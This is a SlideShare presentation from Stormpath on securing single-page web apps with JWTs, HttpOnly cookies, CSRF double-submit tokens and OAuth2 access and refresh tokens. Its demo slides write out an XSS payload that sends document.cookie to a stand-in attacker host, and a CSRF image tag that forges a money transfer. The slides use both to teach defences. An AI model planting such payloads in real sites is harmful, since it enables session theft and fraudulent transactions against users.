SlideShare une entreprise Scribd logo

Building Secure User Interfaces With JWTs

Télécharger en tant que PPTX, PDF
R
robertjd

How to securely use Json Web tokens (JWTs) in a browser environment, and how to securely store them in cookies.

Ingénierie
1  sur  63
Building Secure User Interfaces With JWTs (JSON Web Tokens) Robert Damphousse @robertjd_ Lead Front-End Developer, Stormpath
Slideshare URL: http://goo.gl/kXOpgs
About Me • Full-stack developer 10 years • Full-stack with JavaScript since 2011 (Node.js + Angular) • Currently leading JavaScript at Stormpath
About Stormpath • Cloud-based User Identity API for Developers • Authentication and Authorization as-as-service • RESTful API • Active Directory, LDAP, and SAML Integration • Private Deployments (AWS) • Free plan for developers
Talk Overview • Security Concerns for Modern Web Apps • Cookies, The Right Way • Session ID Problems • Token Authentication to the rescue! • Angular Examples
Structure of Modern Web Apps • Back-end: a RESTful JSON API • Client is usually an HTML5 Environment: • Single Page Apps (“SPAs”), e.g AngularJS, React • WebKit instance • “Hybrid” Mobile apps (Phonegap, etc)
Security Concerns for Modern Web Apps As a developer, you need to: • Secure user credentials • Secure server endpoints (API) • Prevent malicious code from executing in client • Provide Access Control information to the Client
The Traditional Solution, Session Identifiers
We accept username & password, then store a Session ID in a cookie and associate that session with the user.
Securing User Credentials: Session ID Cookie
• This is OK if you protect your cookies • Session ID  Session  User identity • Use a web framework like Apache Shiro or Spring Security to assert security rules, roles stored in a database.
Session ID Problems • They’re opaque and have no meaning themselves (they’re just ‘pointers’) • Session ID  look up server state on *every request*. • Cannot be used for inter-op with other services • JWTs can help with this, but we’ll still use cookies
Cookies, The Right Way ®
Cookies, The Right Way ® Cookies can be easily compromised • Man-in-the-Middle (MITM) • Cross-Site Scripting (XSS) • Cross-Site Request Forgery (CSRF)
Man In The Middle (MITM) Attack Someone ‘listening on the wire’ between the browser and server can see and copy the cookie. Solutions • Use HTTPS/TLS everywhere a cookie will be in transit • Set Secure flag on cookies
Cross-Site Scripting (XSS)
XSS Attacks This is a very REAL problem Happens when someone else can execute code inside your website Can be used to steal your cookies! https://www.owasp.org/index.php/XSS
XSS Attack Demo https://www.google.com/about/appsecurity/ learning/xss/#StoredXSS
XSS Attack Demo
XSS Attack Demo
XSS Attack Demo <img src=x onerror="document.body.appendChild(function (){var a = document.createElement('img'); a.src='https://hackmeplz.com/yourCookies.pn g/?cookies=’ +document.cookie;return a}())" So what if I put this in the chatbox..
XSS Attack Demo GET https://hackmeplz.com/yourCookies.png/?cook ies=SessionID=123412341234 Your browser is going to make this request: Which means..
XSS Attack – What Can I Do? Escape Content • Server-side: Use well-known, trusted libraries to ensure dynamic HTML does not contain executable code. Do NOT roll your own. • Client Side: Escape user input from forms (some frameworks do this automatically, read docs!)
XSS Attack – What Can I Do? Use HTTPS-Only cookies Set the HttpOnly flag on your authentication cookies. HttpOnly cookies are NOT accessible by the JavaScript environment
XSS Attack – What Can I Do? Read this definitive guide: https://www.owasp.org/index.php/XSS
Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) Exploits the fact that HTML tags do NOT follow the Same Origin Policy when making GET requests https://www.owasp.org/index.php/Cross- Site_Request_Forgery_(CSRF) https://developer.mozilla.org/en- US/docs/Web/Security/Same-origin_policy
Cross-Site Request Forgery (CSRF) Example: Attacker puts malicious image into a web page that the user visits: <img src=“https://myapp.com/transferMone y?to=BadGuy&amount=10000”/> .. what happens?
Cross-Site Request Forgery (CSRF) • The browser complies, “The request is going to myapp.com, so I’ll happily send along your cookies for myapp.com!” • Your server trusts the cookies AND the user it identifies, and transfers the money!
Cross-Site Request Forgery (CSRF) Solutions: • Synchronizer Token (for form-based apps) • Double-Submit Cookie (for modern apps) • Origin header check (for extra measure)
Double Submit Cookie • Give client two cookies: (1) Session ID and (2) a strong random value • Client sends back the random value in a custom HTTP header, triggering the Same- Origin-Policy
http://myapp.com/login Login Username Password yo@foo.com ••••••••••••••• Login WWW Server (1) POST /login (2) 200 OK Set-Cookie: session=dh7jWkx8fj; Set-Cookie: xsrf-token=xjk2kzjn4; http://myapp.com/profile Kitsch mustache seitan, meggings Portland VHS ethical ugh. Messenger bag pour-over deep v semiotics, Portland before they sold out small batch slow-carb PBR PBR&B chia synth vegan bitters Brooklyn. (3) GET /profile (4) 200 OK Cookie: session=dh7jWkx8fj; xsrf-token=xjk2kzjn4 X-XSRF-Token: xjk2kzjn4; Hello, Yo Cookie == Header ?
WWW Server http://hackerzapp.com/ req.setHeader(‘X-XSRF- Token’,’stolen token’) BROWSER ERROR No 'Access-Control-Allow- XSRF-Token’ header is present on the requested resource. GET http://myapp.com/profile http://hackerzapp.com/ <img src=“https:// yoursite.com/ transferMoney? to=BadGuy&amount=10000”/> (1) GET /transferMoney? (2) 400 Invalid Token Server rejects forged requests, CSRF token header is missing Browser rejects forged cross-domain AJAX attempts Cookie: session=dh7jWkx8fj; xsrf-token=xjk2kzjn4 Cookie == Header ?
CORS Warning! BEWARE OF THIS ADVICE: Access-Control-Allow-Origin: * Access-Control-Allow-Headers:* DISABLES SAME-ORIGIN POLICY
Origin Header check • Browsers send Origin header • Tells your server where the request is coming from • Cannot be modified by JavaScript • CAN be modified by a malicious HTTP Proxy (use HTTPS!)
At Last.. Token Authentication!
We’re about to go from here: ..to here
Token Auth – All you need to know Authentication is proving who you are The token is a way of persisting that proof JSON Web Tokens (JWTs) are a token format JWTs are often used for the access token and refresh token in Oauth2 workflows
JWTs are fun – let’s go! 
JSON Web Tokens (JWT) In the wild they look like just another ugly string: eyJ0eXAiOiJKV1QiLA0KICJhbGciOiJIUzI1NiJ9.eyJ pc3MiOiJqb2UiLA0KICJleHAiOjEzMDA4MTkzODAsDQo gImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnV lfQ.dBjftJeZ4CVPmB92K27uhbUJU1p1r_wW1gFWFOEj Xk
JSON Web Tokens (JWT) But they do have a three part structure. Each part is a Base64-URL encoded string: eyJ0eXAiOiJKV1QiLA0KICJhb GciOiJIUzI1NiJ9 . eyJpc3MiOiJqb2UiLA0KICJle HAiOjEzMDA4MTkzODAsDQogIm h0dHA6Ly9leGFtcGxlLmNvbS9 pc19yb290Ijp0cnVlfQ . dBjftJeZ4CVPmB92K27uhbUJU 1p1r_wW1gFWFOEjXk Header Body (‘Claims’) Cryptographic Signature
JSON Web Tokens (JWT) Base64-decode the parts to see the contents: { "typ":"JWT", "alg":"HS256" } { "iss”:”http://trustyapp.com/”, "exp": 1300819380, “sub”: ”users/8983462”, “scope”: “self api/buy” } tß´—™à%O˜v+nî…SZu¯µ€U…8H× Header Body (‘Claims’) Cryptographic Signature
JSON Web Tokens (JWT) The claims body is the best part! It asserts: { "iss": "http://trustyapp.com/", "exp": 1300819380, "sub": "users/8983462", "scope": "self api/buy" } Who issued the token When it expires Who it represents What they can do
Issuing JWTs • User has to present credentials to get a token (password, api keys). • Tokens are issued by your server, and signed with a secret key that is private. • The client stores the tokens, and uses them to authenticate requests
Verifying JWTs • Just check the signature and expiration time! Stateless authentication! • Token declares scope, make authorization decisions locally. • But.. How to revoke stateless authentication?
Storing JWTs • Local Storage is not secure (XSS vulnerable) • Use HttpOnly, Secure cookies to store access tokens in the browser. • Cookies provide an automatic way of supplying the tokens on requests • CSRF protection is essential!
JWT + OAuth2
JWT + OAuth2 • OAuth2 (RFC 6749) is an “Authorization Framework” (and a good sleep aid). • It defines the “Resource Owner Password Credentials Grant” • In other words: exchange username and password for an access token and refresh token
JWT + OAuth2 • The access token has a short lifetime, and can use stateless trust – a signed JWT! • The refresh token has a long lifetime and is used to obtain more access tokens. Access tokens should can be revoked (database).
The Access Token and Refresh Token paradigm is designed to give you control over the implicit-trust tradeoff that is made with stateless tokens
Access & Refresh Tokens Refresh token sets the maximum lifetime of the authenticated context. Authentication token sets the maximum time of the stateless authentication context Authentication context is revoked by revoking the refresh token
Examples • Uber-secure banking application (want to force user out often): • Access token TTL = 1 minutes • Refresh token TTL = 30 minutes • Mobile/social app (user should “always be logged in”) • Access token TTL = 1 hour • Refresh token TTL = 4 years (lifetime of mobile device)
Demonstrate! https://github.com/stormpath/express- stormpath-angular-sample-project
Angular App w/ Login Form
Login makes POST to /login POST /login Origin: http://localhost:9000 username=robert%40stormpath.com &password=robert%40stormpath.com
Server Response HTTP/1.1 200 OK set-cookie: access_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJ IUzI1NiJ9.ZJD3YlPMq38IcxN335Umeflnte1nFPDEvoSl26rSXk g…; Expires=Wed, 13 May 2015 07:15:33 GMT; HttpOnly;Path=/; set-cookie: refresh_token=eyJ0iI2NldURFJVJkNZhbGciO iJIUzI1NiJ9.9ybXBhdGguY29tL3YxL2FwcGxpY2F0aW9ucy8…; Expires=Wed, 13 Jun 2015 07:15:33 GMT; HttpOnly;Path=/;
Subsequent Requests GET http://localhost:9000/api/profile Cookie:access_token=eyJ0eXAiOiJKV1QiLCJhbGci OiJIUzI1NiJ9.eyJpc3MiOi92MS9… Cookie:refresh_token=eyJ0iI2NldURFJVJkNZhbGc iO1NiJ9.9ybXBhdGguY29tL3YxL2FwcGxpY2F0aW9ucy 8…
Server Request Handler – Auth Logic • Is the access token valid (signature & expiration)? • Yes? Allow the request • No? Try to get a new access token, using the refresh token • Did that work? • Yes? Allow the request, send new access token on response as cookie • No? Reject the request, delete refresh token cookie
Recap
• Cookies need to be secured! • JWTs are an improvement on the opaque session identifier. • Access Token + Refresh Token is as useful strategy for scaling. • OAuth2 will put you to sleep.
Thanks!
Use Stormpath for API Authentication & Security Our API and libraries give you a cloud-based user database and web application security in no time! Get started with your free Stormpath developer account: https://api.stormpath.com/register Questions? support@stormpath.com

Recommandé

JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
robertjd
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Stormpath
 
Authentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongAuthentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrong
Derek Perkins
 
Token Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJS
Hüseyin BABAL
 
What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?
Derek Edwards
 
2016 pycontw web api authentication
2016 pycontw web api authentication 2016 pycontw web api authentication
2016 pycontw web api authentication
Micron Technology
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorization
Giulio De Donato
 
Securing Web Applications with Token Authentication
Securing Web Applications with Token AuthenticationSecuring Web Applications with Token Authentication
Securing Web Applications with Token Authentication
Stormpath
 

Recommandé

JWT Authentication with AngularJS
JWT Authentication with AngularJSJWT Authentication with AngularJS
JWT Authentication with AngularJS
robertjd
 
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)Building Secure User Interfaces With JWTs (JSON Web Tokens)
Building Secure User Interfaces With JWTs (JSON Web Tokens)
Stormpath
 
Authentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrongAuthentication: Cookies vs JWTs and why you’re doing it wrong
Authentication: Cookies vs JWTs and why you’re doing it wrong
Derek Perkins
 
Token Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJSToken Based Authentication Systems with AngularJS & NodeJS
Token Based Authentication Systems with AngularJS & NodeJS
Hüseyin BABAL
 
What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?What are JSON Web Tokens and Why Should I Care?
What are JSON Web Tokens and Why Should I Care?
Derek Edwards
 
2016 pycontw web api authentication
2016 pycontw web api authentication 2016 pycontw web api authentication
2016 pycontw web api authentication
Micron Technology
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorization
Giulio De Donato
 
Securing Web Applications with Token Authentication
Securing Web Applications with Token AuthenticationSecuring Web Applications with Token Authentication
Securing Web Applications with Token Authentication
Stormpath
 
Spring4 security
Spring4 securitySpring4 security
Spring4 security
Sang Shin
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
Stormpath
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
Igor Bossenko
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache Shiro
Marakana Inc.
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
Mohammed ALDOUB
 
Securing REST APIs
Securing REST APIsSecuring REST APIs
Securing REST APIs
Claire Hunsaker
 
An Introduction to OAuth2
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2
Aaron Parecki
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
Simon Willison
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
Antonio Sanso
 
Build A Killer Client For Your REST+JSON API
Build A Killer Client For Your REST+JSON APIBuild A Killer Client For Your REST+JSON API
Build A Killer Client For Your REST+JSON API
Stormpath
 
JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2
Rodrigo Cândido da Silva
 
Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015
Alvaro Sanchez-Mariscal
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
Abraham Aranguren
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0
robwinch
 
Intro to Apache Shiro
Intro to Apache ShiroIntro to Apache Shiro
Intro to Apache Shiro
Claire Hunsaker
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
Stormpath
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
Kishor Kumar
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
Krishna T
 
Demystifying OAuth 2.0
Demystifying OAuth 2.0Demystifying OAuth 2.0
Demystifying OAuth 2.0
Karl McGuinness
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
Stormpath
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
Conviso Application Security
 

Contenu connexe

Tendances

Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
Igor Bossenko
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
Antonio Sanso
 
Build A Killer Client For Your REST+JSON API
Build A Killer Client For Your REST+JSON APIBuild A Killer Client For Your REST+JSON API
Build A Killer Client For Your REST+JSON API
Stormpath
 

Tendances (20)

Spring4 security
Spring4 securitySpring4 security
Spring4 security
 
Token Authentication for Java Applications
Token Authentication for Java ApplicationsToken Authentication for Java Applications
Token Authentication for Java Applications
 
Single-Page-Application & REST security
Single-Page-Application & REST securitySingle-Page-Application & REST security
Single-Page-Application & REST security
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache Shiro
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
Securing REST APIs
Securing REST APIsSecuring REST APIs
Securing REST APIs
 
An Introduction to OAuth2
An Introduction to OAuth2An Introduction to OAuth2
An Introduction to OAuth2
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
 
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache OltuOAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu
 
Build A Killer Client For Your REST+JSON API
Build A Killer Client For Your REST+JSON APIBuild A Killer Client For Your REST+JSON API
Build A Killer Client For Your REST+JSON API
 
JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2
 
Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015Stateless authentication for microservices - GR8Conf 2015
Stateless authentication for microservices - GR8Conf 2015
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0
 
Intro to Apache Shiro
Intro to Apache ShiroIntro to Apache Shiro
Intro to Apache Shiro
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
Demystifying OAuth 2.0
Demystifying OAuth 2.0Demystifying OAuth 2.0
Demystifying OAuth 2.0
 

Similaire à Building Secure User Interfaces With JWTs

Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
Conviso Application Security
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
DefconRussia
 
Securing Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based AuthenticationSecuring Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based Authentication
Stefan Achtsnit
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
Geoffrey Vandiest
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
Krzysztof Kotowicz
 
How the SSL/TLS protocol works (very briefly) How to use HTTPS
How the SSL/TLS protocol works (very briefly) How to use HTTPSHow the SSL/TLS protocol works (very briefly) How to use HTTPS
How the SSL/TLS protocol works (very briefly) How to use HTTPS
whj76337
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
Jeremiah Grossman
 
Open source security
Open source securityOpen source security
Open source security
lrigknat
 

Similaire à Building Secure User Interfaces With JWTs (20)

Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
 
Securing Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based AuthenticationSecuring Single Page Applications with Token Based Authentication
Securing Single Page Applications with Token Based Authentication
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
How the SSL/TLS protocol works (very briefly) How to use HTTPS
How the SSL/TLS protocol works (very briefly) How to use HTTPSHow the SSL/TLS protocol works (very briefly) How to use HTTPS
How the SSL/TLS protocol works (very briefly) How to use HTTPS
 
Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012Top Ten Web Hacking Techniques of 2012
Top Ten Web Hacking Techniques of 2012
 
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
Biting into the forbidden fruit. Lessons from trusting Javascript crypto.
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
 
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
Going Beyond Cross Domain Boundaries (jQuery Bulgaria)
 
ruxc0n 2012
ruxc0n 2012ruxc0n 2012
ruxc0n 2012
 
Open source security
Open source securityOpen source security
Open source security
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headers
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headers
 
Browsers_SameOriginPolicy_CORS_ContentSecurityPolicy
Browsers_SameOriginPolicy_CORS_ContentSecurityPolicyBrowsers_SameOriginPolicy_CORS_ContentSecurityPolicy
Browsers_SameOriginPolicy_CORS_ContentSecurityPolicy
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 

Dernier

VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
dharasingh5698
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Christo Ananth
 
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
Call Girls in Nagpur High Profile Call Girls
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Call Girls in Nagpur High Profile
 
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Dr.Costas Sachpazis
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Call Girls in Nagpur High Profile
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
Call Girls in Nagpur High Profile
 
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
(ANVI) Koregaon Park Call Girls Just Call 7001035870 [ Cash on Delivery ] Pun...
ranjana rawat
 
result management system report for college project
result management system report for college projectresult management system report for college project
result management system report for college project
Tonystark477637
 
AKTU Computer Networks notes --- Unit 3.pdf
AKTU Computer Networks notes --- Unit 3.pdfAKTU Computer Networks notes --- Unit 3.pdf
AKTU Computer Networks notes --- Unit 3.pdf
ankushspencer015
 

Dernier (20)

KubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghlyKubeKraft presentation @CloudNativeHooghly
KubeKraft presentation @CloudNativeHooghly
 
Introduction to IEEE STANDARDS and its different types.pptx
Introduction to IEEE STANDARDS and its different types.pptxIntroduction to IEEE STANDARDS and its different types.pptx
Introduction to IEEE STANDARDS and its different types.pptx
 
Glass Ceramics: Processing and Properties
Glass Ceramics: Processing and PropertiesGlass Ceramics: Processing and Properties
Glass Ceramics: Processing and Properties
 
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 BookingVIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
VIP Call Girls Ankleshwar 7001035870 Whatsapp Number, 24/07 Booking
 
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
Call for Papers - African Journal of Biological Sciences, E-ISSN: 2663-2187, ...
 
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
(INDIRA) Call Girl Aurangabad Call Now 8617697112 Aurangabad Escorts 24x7
 
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
Top Rated Pune Call Girls Budhwar Peth ⟟ 6297143586 ⟟ Call Me For Genuine Se...
 
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
Structural Analysis and Design of Foundations: A Comprehensive Handbook for S...
 
UNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular ConduitsUNIT-II FMM-Flow Through Circular Conduits
UNIT-II FMM-Flow Through Circular Conduits
 
Introduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptxIntroduction and different types of Ethernet.pptx
Introduction and different types of Ethernet.pptx
 
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
Booking open Available Pune Call Girls Koregaon Park 6297143586 Call Hot Ind...
 
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINEMANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
MANUFACTURING PROCESS-II UNIT-2 LATHE MACHINE
 
Booking open Available Pune Call Girls Pargaon 6297143586 Call Hot Indian Gi...
